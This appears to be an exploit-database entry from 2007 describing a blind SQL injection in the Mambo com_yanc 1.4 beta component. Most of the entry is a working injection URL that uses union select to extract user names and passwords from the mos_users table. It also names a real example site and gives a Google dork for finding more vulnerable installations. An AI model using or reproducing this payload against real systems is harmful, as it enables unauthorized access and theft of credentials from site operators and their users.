id: 1885
date: 05/16/2007
title: Mambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability
author: xoron
cves: 

===============================================================
Mambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability
===============================================================


-------------------------------

Mambo com_yanc v1.4 beta (id) Blind Remote SQL Injection Vuln

-------------------------------------------------------------

Exploit: index.php?option=com_yanc&Itemid=9999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*

Example:http://www.tnrb.net/

-------------------------------------------------------------

google dork: inurl:index.php?option=com_yanc



#  0day.today [2023-03-24]  #